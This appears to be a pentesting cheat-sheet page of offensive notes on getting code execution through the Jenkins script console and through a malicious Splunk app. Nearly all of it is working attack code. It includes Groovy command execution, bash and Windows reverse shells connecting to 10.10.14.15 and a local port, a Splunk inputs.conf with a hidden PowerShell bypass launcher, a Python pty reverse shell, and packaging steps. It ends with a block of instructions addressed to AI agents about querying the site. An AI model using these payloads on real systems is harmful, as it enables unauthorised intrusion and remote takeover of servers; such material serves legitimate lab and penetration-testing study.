# Application Attacks This page covers attacks on applications such as: 1. Jenkins 2. Splunk ## Jenkins After getting access to the console page, we can get RCE via `http://jenkins.inlanefreight.local:8000/script` and write Groovy code ### Linux RCE {% code overflow="wrap" lineNumbers="true" %} ```groovy def cmd = 'id' def sout = new StringBuffer(), serr = new StringBuffer() def proc = cmd.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println sout ``` {% endcode %} ### Linux Reverse Shell {% code overflow="wrap" lineNumbers="true" %} ```groovy r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.14.15/8443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` {% endcode %} ### Windows RCE ```groovy def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); ``` ### Windows Reverse Shell {% code overflow="wrap" lineNumbers="true" %} ```groovy String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` {% endcode %} ## Splunk Reverse Shell using Splunk: This allows us to create an application which runs our commands on the server, and does the reverse connection `inputs.conf` {% code overflow="wrap" lineNumbers="true" %} ```editorconfig [script://./bin/rev.py] disabled = 0 interval = 10 sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10 ``` {% endcode %} `run.bat` {% code overflow="wrap" lineNumbers="true" %} ```batch @ECHO OFF PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'" Exit ``` {% endcode %} `rev.py` {% code overflow="wrap" lineNumbers="true" %} ```python import sys,socket,os,pty ip="10.10.14.15" port="443" s=socket.socket() s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') ``` {% endcode %} Create the Splunk application {% code overflow="wrap" lineNumbers="true" %} ```shell-session tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk mv reverse_shell_splunk.tgz reverse_shell_splunk.spl ``` {% endcode %} Start a reverse shell on our machine and upload the file via `Install app from file` in the Splunk UI --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sheepwall.gitbook.io/home/hacking/exploitation/application-attacks.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.